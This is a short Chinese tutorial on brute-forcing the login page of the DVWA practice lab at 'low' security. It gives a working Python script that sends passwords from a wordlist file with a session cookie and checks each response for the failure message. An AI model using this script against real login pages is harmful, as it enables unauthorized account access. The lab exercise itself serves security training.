实战:DVWA靶场
靶场设置:low级别
判断是否登录成功:看返回的http请求里面是否有
Username and/or password incorrect.
我们这里假设知道用户名是admin不知道密码,要去破解密码
思路:
(1)从字典读取值,生成密码
pwds = open("password.txt") for pwd in pwds: print(pwd) pwds.close()(2)http连接到需要爆破的地址
按F12查看标头,把你的PHPSEEEIONID复制到代码修改就可以
代码:
import requests # 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题 pwds = open("F:\\password.txt") for pwd in pwds: url = "http://localhost/dvwa/vulnerabilities/brute/" # PHPSESSID务必替换为登录以后的PHPSESSID resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=13hjf2259tmmq16ukv2kdc59g6"}) #print(resp.text) if 'Username and/or password incorrect.' in resp.text: print('破解失败:'+pwd, end='') else: print('破解成功:'+pwd, end='') break; pwds.close()(3)获得http响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”
(4)如果有提示就继续下一次循环
(5)如果没有就代表爆破成功
破解成功
登录:用户名:admin,密码password
登录成功